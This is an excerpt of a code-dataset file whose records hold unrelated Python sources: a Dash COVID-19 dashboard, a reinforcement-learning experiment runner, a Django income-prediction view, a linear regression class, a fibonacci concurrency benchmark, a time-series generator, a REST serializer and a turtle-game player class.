dcc.Dropdown(id='my-dropdown2',\n \n options=[{'label': i, 'value': i} for i in sorted(df_states['state'].unique())],\n #multi=True,\n value='Massachusetts',\n searchable=False,\n \n ),\n ], style={'margin': 'auto', 'width': '50%', 'text-align': 'center', 'color': 'black'}),\n\n html.Br(),\n\n # Radio Button Graph\n html.Div([\n\n dcc.RadioItems(id='r_button',\n options=[\n {'label': 'Cases', 'value': 'CASES'},\n {'label': 'Deaths', 'value': 'DEATH'},\n {'label': 'Both', 'value': 'BOTH'}\n ],\n value='BOTH',\n labelStyle={'display': 'inline-block', 'margin-bottom': '10px', 'padding': '5px 5px'}\n ) \n\n ],className='row', style={'text-align': 'left', 'margin-left': '90px'}),\n \n # Main Content Div \n\n html.Div([\n \n # graph div\n html.Div([\n\n dcc.Graph(id='graph_1')\n\n ],className='six columns'),\n \n # Data div\n html.Div([\n\n html.Div(id='total_cases'),\n\n ],className='six columns'),\n\n # second graph div\n html.Div([\n\n dcc.Graph(id='graph_2')\n\n ],className='twelve columns'),\n \n ],className='container'),\n ])# end of Tab 2\n\n ##########################################################\n# State Graphs Callback and Functions\n# Case Graph\n\n@app.callback(Output('graph_1', 'figure'),\n [Input('my-dropdown2', 'value'), Input('r_button', 'value')])\n\ndef update_figure(value, button):\n\n if button == 'BOTH':\n\n df3 = df_states[df_states['state'] == value]\n \n df3 = df3.set_index('date')\n \n df4 = df3['cases'].diff()\n df5 = df3['deaths'].diff()\n\n df4 = df4.mask(df4 < 0)\n df5 = df5.mask(df5 < 0)\n\n figure={\n \n 'data': [\n \n {'x': df4.index, 'y': df4, 'type': 'line', 'name': 'cases'},\n {'x': df5.index, 'y': df5, 'type': 'line', 'name': 'deaths'},\n\n ],\n 'layout': {\n 'title': 'Cases & Deaths',\n 'height': 310,\n 'paper_bgcolor': '#082255',\n 'plot_bgcolor': '#082255',\n 'font': {'color': 'white'},\n 
}}\n\n return(figure)\n\n elif button == 'CASES':\n\n df3 = df_states[df_states['state'] == value]\n \n df3 = df3.set_index('date')\n \n df4 = df3['cases'].diff()\n df5 = df3['deaths'].diff()\n\n df4 = df4.mask(df4 < 0)\n df5 = df5.mask(df5 < 0)\n\n figure={\n \n 'data': [\n \n {'x': df4.index, 'y': df4, 'type': 'line', 'name': 'cases'},\n\n ],\n 'layout': {\n 'title': 'Cases',\n 'paper_bgcolor': '#082255',\n 'plot_bgcolor': '#082255',\n 'font': {'color': 'white'},\n }}\n\n return(figure)\n \n elif button == 'DEATH':\n\n df3 = df_states[df_states['state'] == value]\n \n df3 = df3.set_index('date')\n \n df4 = df3['cases'].diff()\n df5 = df3['deaths'].diff()\n\n df4 = df4.mask(df4 < 0)\n df5 = df5.mask(df5 < 0)\n\n figure={\n \n 'data': [\n \n {'x': df5.index, 'y': df5, 'type': 'line', 'name': 'deaths', 'marker': {'color': 'orange'}},\n\n ],\n 'layout': {\n 'title': 'Deaths',\n 'paper_bgcolor': '#082255',\n 'plot_bgcolor': '#082255',\n 'font': {'color': 'white'},\n }}\n\n return(figure)\n\n@app.callback(Output('total_cases', 'children'),\n [Input('my-dropdown2', 'value')])\n\ndef update_contetnt(value):\n\n # New DataFrame\n dff = df_states[df_states['state'] == value]\n\n # Case and Death Totals\n t_cases = dff['cases'].iloc[-1]\n t_deaths = dff['deaths'].iloc[-1]\n\n # Case Calculations\n dff2 = dff.set_index('date')\n dff2 = dff2['cases'].diff()\n dff2 = dff2.dropna()\n\n average_cases = dff2.mean()\n average_cases = round(average_cases)\n\n case_percent = (dff['cases'].iloc[-1] - dff['cases'].iloc[-5]) / dff['cases'].iloc[-5] * 100\n case_percent = round(case_percent, 2)\n \n month_cases = (dff['cases'].iloc[-1] - dff['cases'].iloc[-30]) / dff['cases'].iloc[-30] * 100\n month_cases = round(month_cases, 2)\n\n average_5_cases = dff2.tail()\n average_5_cases = round(average_5_cases.mean())\n\n average_30_cases = dff2.tail(30)\n average_30_cases = round(average_30_cases.mean())\n\n # Death Calculations\n dff3 = dff.set_index('date')\n dff3 = dff3['deaths'].diff()\n dff3 = dff3.dropna()\n\n average_deaths = dff3.mean()\n average_deaths = round(average_deaths)\n\n death_percent = (dff['deaths'].iloc[-1] - dff['deaths'].iloc[-5]) / dff['deaths'].iloc[-5] * 100\n death_percent = round(death_percent, 2)\n \n month_deaths = (dff['deaths'].iloc[-1] - dff['deaths'].iloc[-30]) / dff['deaths'].iloc[-30] * 100\n month_deaths = round(month_deaths, 2)\n\n average_5_deaths = dff3.tail()\n average_5_deaths = round(average_5_deaths.mean())\n\n average_30_deaths = dff3.tail(30)\n average_30_deaths = round(average_30_deaths.mean())\n\n return(\n # HTML TABLE\n html.Table([\n html.Tr([\n # Headers\n html.Th(' '),\n html.Th('Cases'),\n html.Th('Deaths'),\n\n ] ),\n\n html.Tr([\n #Total\n html.Td('Total:'),\n html.Td('{:,}'.format(t_cases)),\n html.Td('{:,}'.format(t_deaths)),\n\n ] ),\n \n html.Tr([\n #Average per day\n html.Td('Daily Average:'),\n html.Td('{:,}'.format(average_cases)),\n html.Td('{:,}'.format(average_deaths)),\n\n ] ),\n\n html.Tr([\n # Average 5 Days\n html.Td('Average Last 5 Days:'),\n html.Td('{:,}'.format(average_5_cases)),\n html.Td('{:,}'.format(average_5_deaths)),\n\n ] ),\n \n html.Tr([\n # Average 30 Days\n html.Td('Average Last 30 Days:'),\n html.Td('{:,}'.format(average_30_cases)),\n html.Td('{:,}'.format(average_30_deaths)),\n\n ] ),\n\n html.Tr([\n # Change 5 Days\n html.Td('% Change 5 Days:'),\n html.Td('{:,}%'.format(case_percent)),\n html.Td('{:,}%'.format(death_percent)),\n ] ),\n \n html.Tr([\n #Change 30 Days\n html.Td('% Change 30 Days:'),\n 
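Every change figure in update_contetnt above follows one pattern: compare the latest cumulative value with the one five (or thirty) rows earlier and express the difference as a percentage of the older value. A standalone check of the 5-day variant with made-up numbers:

import pandas as pd

cases = pd.Series([100, 110, 120, 130, 140, 150])  # cumulative counts, one row per day
pct_change_5d = (cases.iloc[-1] - cases.iloc[-5]) / cases.iloc[-5] * 100
print(round(pct_change_5d, 2))  # 36.36 -> growth from 110 to 150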
html.Td('{:,}%'.format(month_cases)),\n            html.Td('{:,}%'.format(month_deaths)),\n\n            ] ),\n\n        ] ),\n    )\n\n# Graph 2\n\n@app.callback(Output('graph_2', 'figure'),\n        [Input('my-dropdown2', 'value'), Input('r_button', 'value')])\n\n\n# renamed from update_figure so it no longer shadows the graph_1 callback above\ndef update_figure_2(value, button):\n\n\n    if button == 'BOTH':\n\n        df3 = df_states[df_states['state'] == value]\n    \n        df3 = df3.set_index('date')\n    \n        df4 = df3['cases'].diff()\n        df5 = df3['deaths'].diff()\n\n        df4 = df4.mask(df4 < 0)\n        df5 = df5.mask(df5 < 0)\n\n        df4 = df4.tail()\n        df5 = df5.tail()\n\n        figure={\n            \n            'data': [\n                \n                {'x': df4.index, 'y': df4, 'type': 'bar', 'name': 'cases'},\n                {'x': df5.index, 'y': df5, 'type': 'bar', 'name': 'deaths'},\n\n            ],\n            'layout': {\n                'title': 'Last 5 Days',\n                'height': 300,\n                # the duplicate 'xaxis' keys silently discarded the first entry; merged into one dict\n                # ('maxnumberoflabels' is not a Plotly axis property - 'nticks' caps the tick count)\n                'xaxis': {'tickformat': '%b %d, %Y', 'nticks': 5},\n                'paper_bgcolor': '#082255',\n                'plot_bgcolor': '#082255',\n                'font': {'color': 'white'}  \n                \n            }}\n\n        return(figure)\n\n    elif button == 'CASES':\n\n        df3 = df_states[df_states['state'] == value]\n    \n        df3 = df3.set_index('date')\n    \n        df4 = df3['cases'].diff()\n        df5 = df3['deaths'].diff()\n\n        df4 = df4.mask(df4 < 0)\n        df5 = df5.mask(df5 < 0)\n\n        df4 = df4.tail()\n        \n        figure={\n            \n            'data': [\n                \n                {'x': df4.index, 'y': df4, 'type': 'bar', 'name': 'cases'},\n                {'x': df4.index, 'y': df4, 'type': 'line', 'marker': {'color': 'black'}},\n\n            ],\n            'layout': {\n                'title': 'Cases Last 5 Days', \n                'xaxis': {'tickformat': '%b %d, %Y', 'nticks': 5},\n                'paper_bgcolor': '#082255',\n                'plot_bgcolor': '#082255',\n                'font': {'color': 'white'}  \n            }}\n\n\n        return(figure)\n    \n    elif button == 'DEATH':\n\n        df3 = df_states[df_states['state'] == value]\n    \n        df3 = df3.set_index('date')\n    \n        df4 = df3['cases'].diff()\n        df5 = df3['deaths'].diff()\n\n        df4 = df4.mask(df4 < 0)\n        df5 = df5.mask(df5 < 0)\n\n        df5 = df5.tail()\n\n        figure={\n            \n            'data': [\n                \n                {'x': df5.index, 'y': df5, 'type': 'bar', 'name': 'deaths', 'marker': {'color': 'orange'}},\n                {'x': df5.index, 'y': df5, 'type': 'line', 'marker': {'color': 'black'}},\n\n            ],\n            'layout': {\n                'title': 'Deaths Last 5 Days', \n                'xaxis': {'tickformat': '%b %d, %Y', 'nticks': 5},\n                'paper_bgcolor': '#082255',\n                'plot_bgcolor': '#082255',\n                'font': {'color': 'white'}  \n                \n            }}\n\n        return(figure)\n\n########################################################\n\napp.config.suppress_callback_exceptions=True\n\nserver = app.server\n\nif __name__ == '__main__':\n    app.run_server(debug=True)\n","repo_name":"chadless1/c19-stats-app","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":20735,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"32787378023","text":"import numpy as np\nimport sys\nimport plotting as plotting\nfrom matplotlib import pyplot as plt\nfrom matplotlib.patches import Rectangle\nfrom matplotlib import pylab\nimport matplotlib.gridspec as gridspec\nimport time\n\nclass Experiment(object):\n    def __init__(self, env, agent, EPISODES=1000, training=True, episode_max_length=None, mean_episodes=10, stop_criterion=100):\n        self.start_time = time.time()\n        self.env = env\n        self.agent = agent\n        self.EPISODES = EPISODES\n        self.training = training\n        self.episode_max_length = episode_max_length\n        self.mean_episodes = mean_episodes\n        self.stop_criterion = stop_criterion\n        self.high_score = 0\n        \n        self.episode_length = np.array([0])\n        self.episode_reward = np.array([0])\n        \n        # Partie graphique\n        self.fig = pylab.figure(figsize=(10, 5))\n        gs = 
gridspec.GridSpec(2, 2)\n self.ax = pylab.subplot(gs[:, 0])\n self.ax.xaxis.set_visible(False)\n self.ax.yaxis.set_visible(False)\n \n if hasattr(self.env, '_cliff'): # Hardcode to nicely display grid for cliffwalkingenv\n self.ax.xaxis.set_visible(True)\n self.ax.yaxis.set_visible(True)\n self.ax.set_xticks(np.arange(-.5, 12, 1), minor=True);\n self.ax.set_yticks(np.arange(-.5, 4, 1), minor=True);\n self.ax.grid(which='minor', color='w', linestyle='-', linewidth=1)\n \n if hasattr(self.env, 'winds'): # Hardcode to nicely display grid for windygridworldenv\n self.ax.xaxis.set_visible(True)\n self.ax.yaxis.set_visible(True)\n self.ax.set_xticks(np.arange(-.5, 10, 1), minor=True);\n self.ax.set_yticks(np.arange(-.5, 7, 1), minor=True);\n self.ax.grid(which='minor', color='w', linestyle='-', linewidth=1)\n \n self.ax1 = pylab.subplot(gs[0, 1])\n self.ax1.yaxis.set_label_position(\"right\")\n self.ax1.set_ylabel('Length')\n \n self.ax1.set_xlim(0, max(10, len(self.episode_length)+1))\n self.ax1.set_ylim(0, 51)\n \n self.ax2 = pylab.subplot(gs[1, 1])\n self.ax2.set_xlabel('Episode')\n self.ax2.yaxis.set_label_position(\"right\")\n self.ax2.set_ylabel('Reward')\n self.ax2.set_xlim(0, max(10, len(self.episode_reward)+1))\n self.ax2.set_ylim(0, 2)\n \n self.line, = self.ax1.plot(range(len(self.episode_length)),self.episode_length)\n self.line2, = self.ax2.plot(range(len(self.episode_reward)),self.episode_reward)\n \n def update_display_step(self, step = None):\n if not hasattr(self, 'imgplot'):\n self.imgplot = self.ax.imshow(self.env.render(mode='rgb_array'), interpolation='none', cmap='viridis')\n else:\n self.imgplot.set_data(self.env.render(mode='rgb_array'))\n \n self.fig.canvas.draw()\n #if not self.training:\n # time.sleep(0.05) #5/100 de seconde\n \n \n def update_display_episode(self): \n self.line.set_data(range(len(self.episode_length)),self.episode_length)\n self.ax1.set_xlim(0, max(10, len(self.episode_length)+1))\n self.ax1.set_ylim(0, max(self.episode_length)+1)\n \n self.line2.set_data(range(len(self.episode_reward)),self.episode_reward)\n self.ax2.set_xlim(0, max(10, len(self.episode_reward)+1))\n self.ax2.set_ylim(min(self.episode_reward)-1, max(self.episode_reward)+1)\n \n self.fig.canvas.draw() \n \n def start_run(self):\n self.start_time = time.time()\n start_time_display = time.strftime(\"%Y-%m-%d %H:%M:%S\")\n self.agent.log(\"--------------------------------------------------------\")\n self.agent.log(f\"Nouvelle séquence de {self.EPISODES} épisodes, débutée le {start_time_display}...\")\n self.agent.log(\"--------------------------------------------------------\")\n self.high_score = 0\n if not self.training:\n self.agent.log(\"> Mode REPLAY\")\n \n def end_run(self):\n # Enregistrer le modèle à la fin\n if self.training:\n self.agent.saveModel()\n \n running_total_seconds = round(time.time() - self.start_time, 0)\n running_total_minutes = round(running_total_seconds / 60, 1)\n self.agent.log(f\"- Temps de traitement: {running_total_minutes} minutes\")\n self.agent.log(\"--------------------------------------------------------\")\n self.agent.log(\"\", flushBuffer=True)\n \n def run_qlearning(self, interactive = False, display_frequency=1, save_model_each_n_episodes = 50, time_penalty=0, life_penalty=0):\n self.start_run()\n \n BYTE_VIE = 57\n\n # repeat for each episode\n for episode_number in range(self.EPISODES):\n \n # initialize state \n state = self.env.reset()\n \n done = False # used to indicate terminal state\n R = 0 # used to display accumulated rewards for an 
episode\n t = 0 # used to display accumulated steps for an episode i.e episode length\n \n # repeat for each step of episode, until state is terminal\n while not done:\n \n t += 1 # increase step counter - for display\n \n # choose action from state using policy derived from Q\n action = self.agent.act(state)\n \n # take action, observe reward and next state\n next_state, reward, done, _ = self.env.step(action)\n\n # Pénaliser le fait de ne rien faire pour éviter des épisodes qui s'étirent\n learning_reward = reward\n \n # Après discussions avec Mikael, ne pas pénaliser l'inaction ou les vies\n if learning_reward == 0:\n vies_actuelles = state[BYTE_VIE]\n vies_apres = next_state[BYTE_VIE]\n if vies_apres < vies_actuelles:\n #print(\"vie perdue\")\n learning_reward = -life_penalty # Pénaliser fortement la perte de vie\n else:\n learning_reward = -time_penalty # Pénaliser légèrement l'inaction\n \n # agent learn (Q-Learning update)\n if self.training:\n self.agent.learn(state, action, learning_reward, next_state, done)\n \n # state <- next state\n state = next_state\n \n R += reward # accumulate reward - for display\n \n # if interactive display, show update for each step \n #if self.training and interactive:\n self.update_display_step(t)\n \n # If cancel requested, exit\n if self.agent.isCancelRequested():\n self.agent.log(\"*** Arrêt demandé détecté ***\", flushBuffer=True)\n break;\n\n \n self.episode_length = np.append(self.episode_length,t) # keep episode length - for display\n self.episode_reward = np.append(self.episode_reward,R) # keep episode reward - for display \n\n\n if R > 0:\n self.agent.log(f\"Épisode {episode_number+1}/{self.EPISODES}: R={R}, Steps={t}\", doPrint=not interactive)\n \n # Update image of highest score only\n if interactive:\n if R >= self.high_score:\n self.update_display_step()\n self.update_display_episode()\n \n if R > self.high_score:\n self.high_score = R\n self.agent.log(f\"\\tNouveau meilleur score à: {self.high_score}, épisode #{episode_number + 1}\", flushBuffer=True)\n \n # Sauvegarde du modèle tous les n épisodes\n if self.training and save_model_each_n_episodes != None and (episode_number + 1) % save_model_each_n_episodes == 0:\n self.agent.saveModel()\n \n # if interactive display, show update for the episode\n if not self.training and interactive:\n self.update_display_episode()\n \n # If cancel requested, exit\n if self.agent.isCancelRequested():\n self.agent.log(\"*** Arrêt demandé par l'usager ***\", flushBuffer=True)\n break;\n \n \n # if interactive display, show graph at the end\n if interactive:\n self.update_display_episode()\n \n else:\n self.fig.clf()\n stats = plotting.EpisodeStats(\n episode_lengths=self.episode_length,\n episode_rewards=self.episode_reward,\n episode_running_variance=np.zeros(self.EPISODES))\n plotting.plot_episode_stats(stats, display_frequency)\n \n self.agent.log(\"\")\n self.agent.log(f\"Fin des épisodes\")\n self.agent.log(f\"Meilleur score obtenu: {self.high_score}\")\n self.agent.log(f\"Durée moyenne: {round(np.average(self.episode_length), 1)} actions\")\n self.agent.log(f\"Score moyen: {round(np.average(self.episode_reward), 2)} points\")\n self.agent.log(\"\", flushBuffer=True)\n \n self.end_run()\n \n \n def run_actorcritic(self):\n self.start_run()\n \n # Tableaux utiles pour l'affichage\n scores, mean, episodes, lengths = [], [], [], []\n \n plt.ion()\n fig_size = plt.rcParams[\"figure.figsize\"]\n fig_size[0] = 8\n fig_size[1] = 7\n \n fig1, (ax1_1, ax1_2, ax1_3) = plt.subplots(3, sharex=True)\n 
fig1.canvas.draw()\n\n for i in range(self.EPISODES):\n done = False\n score = 0\n state = self.env.reset()\n\n counter = 0\n while not done:\n counter +=1\n\n # Afficher l'environnement\n if self.agent.render:\n self.env.render()\n\n # Obtient l'action pour l'état courant\n action = self.agent.act(state)\n\n # Effectue l'action\n next_state, reward, done, _ = self.env.step(action)\n\n self.agent.learn(state, action, reward, next_state, done )\n\n # Mise à jour de l'état\n state = next_state\n\n # Accumulation des récompenses\n score += reward\n\n # Arrête l'épisode après 'episode_max_length' instants\n if self.episode_max_length != None and counter >= self.episode_max_length:\n done = True\n \n \n if score > self.high_score:\n self.high_score = score\n self.agent.log(f\"\\tNouveau meilleur score à: {self.high_score}, épisode #{i + 1}\", flushBuffer=True)\n \n # Arrête l'entraînement lorsque la moyenne des récompense sur 'mean_episodes' épisodes est supérieure à \n if np.mean(scores[-self.mean_episodes:]) > self.stop_criterion:\n break\n\n # Sauvegarde du modèle (poids) tous les 25 épisodes\n if self.training and (i + 1) % 25 == 0:\n self.agent.saveModel()\n self.agent.log(f\"\\tÉpisode {i + 1}\", flushBuffer=True)\n \n # Affichage des récompenses obtenues\n if self.training == True:\n scores.append(score)\n mean.append(np.mean(scores[-self.mean_episodes:]))\n episodes.append(i)\n lengths.append(counter)\n \n ax1_1.clear()\n ax1_1.plot(episodes, scores, 'b', label='gains')\n \n ax1_2.clear()\n ax1_2.plot(episodes, mean, 'r', label='Moyenne des gains')\n \n ax1_3.clear()\n ax1_3.plot(episodes, lengths, 'g', label='Durée')\n \n fig1.canvas.draw()\n \n #ax1_1.set_xlabel(\"Épisodes\")\n ax1_1.set_ylabel(\"Gains\")\n #ax1_2.set_xlabel(\"Épisodes\")\n ax1_2.set_ylabel(\"Moyenne des gains\")\n ax1_3.set_xlabel(\"Épisodes\")\n ax1_3.set_ylabel(\"Durée\")\n #plt.legend(loc='upper left')\n \n # If cancel requested, exit\n if self.agent.isCancelRequested():\n self.agent.log(\"*** Arrêt demandé par l'usager ***\", flushBuffer=True)\n break;\n \n self.agent.log(\"\")\n self.agent.log(f\"Fin des épisodes\")\n self.agent.log(f\"- Meilleur score obtenu: {self.high_score}\")\n self.agent.log(f\"- Durée moyenne: {round(np.average(lengths), 1)} actions\")\n self.agent.log(f\"- Score moyen: {round(np.average(scores), 2)} points\")\n self.agent.log(\"\", flushBuffer=True)\n \n self.end_run()","repo_name":"jsparent/ai-rl","sub_path":"breakout/simulation.py","file_name":"simulation.py","file_ext":"py","file_size_in_byte":13153,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"11237101986","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.shortcuts import render\nfrom django.http import HttpResponseRedirect, HttpResponse\nfrom sklearn.externals import joblib\n\n# Create your views here.\ndef index(req):\n\treturn render(req, 'Web/index.html', {})\n\ndef process(req):\n\twcs = ['Federal-gov', 'Local-gov', 'Never-worked', 'Not-worked', 'Private', 'Self-emp-inc', 'Self-emp-not-inc', 'State-gov', 'Without-pay']\n\tedus = ['10th', '11th', '12th', '1th-4th', '5th-6th', '7th-8th', '9th', 'Assoc-acdm', 'Assoc-voc', 'Bachelors', 'Doctorate', 'HS-grad', 'Masters', 'Preschool', 'Prof-school', 'Some-college']\n\tmss = ['Divorced', 'Married-af-spouse', 'Married-civ-spouse', 'Married-spouse-absent', 'Never-married', 'Separated', 'Widowed']\n\tocs = ['Adm-clerical', 'Armed-Forces', 'Craft-repair',\n\t\t'Exec-managerial', 
'Farming-fishing', 'Handlers-cleaners', 'Machine-op-inspct', 'None', 'Other-service', 'Priv-house-serv', 'Prof-specialty', 'Protective-serv', 'Sales',\n\t\t'Tech-support', 'Transport-moving']\n\trels = ['Husband', 'Not-in-family', 'Other-relative', 'Own-child', 'Unmarried', 'Wife']\n\trcs = ['Amer-Indian-Eskimo', 'Asian-Pac-Islander', 'Black', 'Other', 'White']\n\tsxs = ['Female', 'Male']\n\tncs = ['Cambodia', 'Canada', 'China', 'Columbia', 'Cuba', 'Dominican-Republic', 'Ecuador', 'El-Salvador', 'England', 'France', 'Germany', 'Greece', 'Guatemala', 'Haiti',\n\t\t'Holand-Netherlands', 'Honduras', 'Hong', 'Hungary', 'India', 'Iran', 'Ireland', 'Italy', 'Jamaica', 'Japan', 'Laos', 'Mexico', 'Nicaragua', 'Other-country',\n\t\t'Outlying-US(Guam-USVI-etc)', 'Peru', 'Philippines', 'Poland', 'Portugal', 'Puerto-Rico', 'Scotland', 'South', 'Taiwan', 'Thailand', 'Trinadad&Tobago', 'United-States',\n\t\t'Vietnam', 'Yugoslavia']\n\tage = req.POST['age']\n\tfnlwgt = req.POST['fnlwgt']\n\tedunum = req.POST['education-num']\n\tgain = req.POST['capital-gain']\n\tloss = req.POST['capital-loss']\n\thours = req.POST['hours-per-week']\n\tworkclass = wcs.index(req.POST['workclass'])\n\tedu = edus.index(req.POST['education'])\n\tmarital = mss.index(req.POST['marital-status'])\n\tocc = ocs.index(req.POST['occupation'])\n\trelationship = rels.index(req.POST['relationship'])\n\trace = rcs.index(req.POST['race'])\n\tsex = sxs.index(req.POST['sex'])\n\tnative = ncs.index(req.POST['native-country'])\n\tinp = [int(age), int(fnlwgt), int(edunum), int(gain), int(loss), int(hours)]\n\tfor i in range(0, 102):\n\t\tinp.append(0)\n\tinp[6 + workclass] = 1\n\tinp[15 + edu] = 1\n\tinp[31 + marital] = 1\n\tinp[38 + occ] = 1\n\tinp[53 + relationship] = 1\n\tinp[59 + race] = 1\n\tinp[64 + sex] = 1\n\tinp[66 + native] = 1\n\tpred = [0]\n\tcontext = {}\n\tif (pred[0] == 0):\n\t\tcontext = {\n\t\t\t'prediction' : '<=50K'\n\t\t}\n\telse :\n\t\tcontext = {\n\t\t\t'prediction' : '>50K'\n\t\t}\n\treturn render(req, 'Web/process.html', context)","repo_name":"dewitast/Tubes-AI","sub_path":"IncomePredictionWebApp/Web/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"31367945569","text":"import numpy as np\r\nclass Linear_regression:\r\n    def __init__(self,data,labels):\r\n        self.standardize_data = Linear_regression.standardize(data)\r\n        self.data = data\r\n        self.labels = labels\r\n        # np.random.rand takes the dimensions as separate arguments, not a tuple\r\n        self.theta = np.random.rand(self.data.shape[1], 1)\r\n\r\n    def train(self,ETA,num_iteration = 500):\r\n        cost_history = self.gradient_descend(ETA,num_iteration)\r\n        return self.theta,cost_history\r\n    \r\n    def gradient_descend(self,ETA,num_iteration = 500):\r\n        cost_history = []\r\n        for _ in range(num_iteration):\r\n            self.gradient_step(ETA)\r\n            cost_history.append(self.cost_function(self.data,self.labels))\r\n        return cost_history\r\n    def cost_function(self,data,labels):\r\n        num_example = data.shape[0]\r\n        delta = Linear_regression.hypothesis(self.data,self.theta) - labels\r\n        cost = (0.5 * np.dot(delta.T,delta))/num_example\r\n        return cost[0][0]\r\n    def gradient_step(self,ETA):\r\n        num_example = self.data.shape[0]\r\n        prediction = Linear_regression.hypothesis(self.data,self.theta)\r\n        theta = self.theta\r\n        # gradient of the squared-error cost: (1/m) * X^T (X theta - y)\r\n        theta = theta - ETA * (1/num_example) * np.dot(self.data.T, prediction - self.labels)\r\n        self.theta = theta\r\n        return theta\r\n\r\n    @staticmethod\r\n    def hypothesis(data,theta):\r\n        return np.dot(data,theta)\r\n\r\n\r\n    @staticmethod\r\n    
def standardize(data):\r\n        # removed the stray 'self' parameter: a @staticmethod receives no instance,\r\n        # and the constructor calls Linear_regression.standardize(data) with one argument\r\n        mu = np.mean(data)\r\n        std = np.std(data)\r\n        return (data - mu) / std  ","repo_name":"kaimu11111/ML-code","sub_path":"Linear_regression.py","file_name":"Linear_regression.py","file_ext":"py","file_size_in_byte":1479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"22770875105","text":"import time\nfrom multiprocessing import Process\nfrom threading import Thread\n\n\ndef get_fib(n):\n    if n < 0:\n        raise ValueError(f\"Invalid n: {n}.\")\n    elif n == 0:\n        return 0\n    elif n == 1:\n        return 1\n    else:\n        return get_fib(n - 1) + get_fib(n - 2)\n\n\ndef run_synchronously():\n    def inner(n, times):\n        for _ in range(times):\n            get_fib(n)\n\n    return inner\n\n\ndef run_parallel(executor):\n    def inner(n, times):\n        executors = [executor(target=get_fib, args=(n,)) for _ in range(times)]\n        [ex.start() for ex in executors]\n        [ex.join() for ex in executors]\n\n    return inner\n\n\ndef eval_time(f, n, times):\n    start_time = time.time()\n    f(n, times)\n    elapsed = time.time() - start_time\n    return elapsed\n\n\ndef main():\n    n, times = 35, 10\n\n    with open(\"artifacts/fibonacci.txt\", \"w\") as file:\n        file.write(f\"n={n}, times={times}\\n\")\n        file.write(f\"base: {eval_time(run_synchronously(), n, times):.2f} sec\\n\")\n        file.write(f\"threading: {eval_time(run_parallel(Thread), n, times):.2f} sec\\n\")\n        file.write(f\"multiprocessing: {eval_time(run_parallel(Process), n, times):.2f} sec\\n\")\n\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"Sushentsev/hse-advanced-python","sub_path":"hw_4/fibonacci.py","file_name":"fibonacci.py","file_ext":"py","file_size_in_byte":1213,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"21369073159","text":"import numpy as np\nfrom generators import arma, toFile\n\nnp.random.seed(12345)\n\nplot = True\n\npivot = np.arange(1000) / 10\n\nslags = [0.5]\nnlags = []\nnoise0 = np.random.normal(loc=0, scale=0.5, size=(len(pivot),))\nsignal0, _ = arma(slags, nlags, pivot, noise=noise0, plot=plot)\nslags = [-0.5]\nnlags = []\nnoise1 = np.random.normal(loc=0, scale=1.5, size=(len(pivot),))\nsignal1, _ = arma(slags, nlags, pivot, noise=noise1, plot=plot)\n\n# Create two clusters by swapping the noise signals halfway through the series\nsplit = int(len(pivot) // 2)\ns0 = np.append(signal0[:split], signal1[split:])\ns1 = np.append(signal1[:split], signal0[split:])\n\nif plot:\n    import matplotlib.pyplot as plt\n    fig, ax = plt.subplots()\n    ax.plot(pivot, s0, '.-', label='0')\n    ax.plot(pivot, s1, '.-', label='1')\n    ax.legend()\n    plt.show()\n\n\nout = np.zeros((len(pivot), 3))\nout[:, 0] = pivot\nout[:, 1] = s0\nout[:, 2] = s1\ntoFile(out, 'Clustered_A')\n","repo_name":"idaholab/raven","sub_path":"tests/framework/ROM/TimeSeries/SyntheticHistory/TrainingData/generateClustered.py","file_name":"generateClustered.py","file_ext":"py","file_size_in_byte":919,"program_lang":"python","lang":"en","doc_type":"code","stars":195,"dataset":"github-code","pt":"38"} +{"seq_id":"12825092463","text":"from rest_framework import serializers\nfrom core.models import Star\n\n\nclass StarSerializer(serializers.ModelSerializer):\n    # Serializer for tags\n    QuerySet = Star.objects.all()\n\n    class Meta:\n        model = Star\n        fields = [\n            'id',\n            'name',\n            'bio',\n            'birth_day',\n            'birth_place',\n            'image'\n        ]\n        read_only_fields = 
('id',)\n","repo_name":"ghmaimon/Soul-Rate","sub_path":"Back-End/api/star/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"30888705998","text":"from sprite import Sprite\r\nimport math\r\nimport winsound\r\nimport random\r\n\r\nclass Player(Sprite):\r\n def __init__(self, spriteshape, color, startx, starty):\r\n Sprite.__init__(self, spriteshape, color, startx, starty)\r\n self.shapesize(stretch_wid=0.8, stretch_len=1.2, outline=None)\r\n # zamiast speed jest dx i dy\r\n self.dx = 0\r\n self.dy = 0\r\n self.rotationalSpeed = 0\r\n \r\n def move(self): # nadpisanie metody move() odziedziczonej po klasie Sprite\r\n self.goto(self.xcor() + self.dx, self.ycor() + self.dy)\r\n # boundary detection\r\n if self.xcor() > 290:\r\n self.dx = - self.dx\r\n if self.xcor() < -290:\r\n self.dx = - self.dx\r\n if self.ycor() > 290:\r\n self.dy = - self.dy\r\n if self.ycor() < -290:\r\n self.dy = - self.dy\r\n\r\n def turn_left(self):\r\n self.rotationalSpeed = 30\r\n self.setheading(self.heading() + self.rotationalSpeed)\r\n\r\n def turn_right(self):\r\n self.rotationalSpeed = -30\r\n self.setheading(self.heading() + self.rotationalSpeed)\r\n\r\n def accelerate(self):\r\n self.dx += math.cos(math.radians(self.heading())) * 1 # dodaje liczbe z przedzialu <-1, 1>\r\n #print(self.dx)\r\n self.dy += math.sin(math.radians(self.heading())) * 1 # dodaje liczbe z przedzialu <-1, 1>\r\n #print(self.dy)\r\n\r\n def hyperspace(self):\r\n winsound.PlaySound('hyperspace.wav', winsound.SND_ASYNC)\r\n self.goto(random.randint(-250, 250), random.randint(-250, 250))\r\n ","repo_name":"niezwyklyable/Space-War","sub_path":"player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":1565,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} 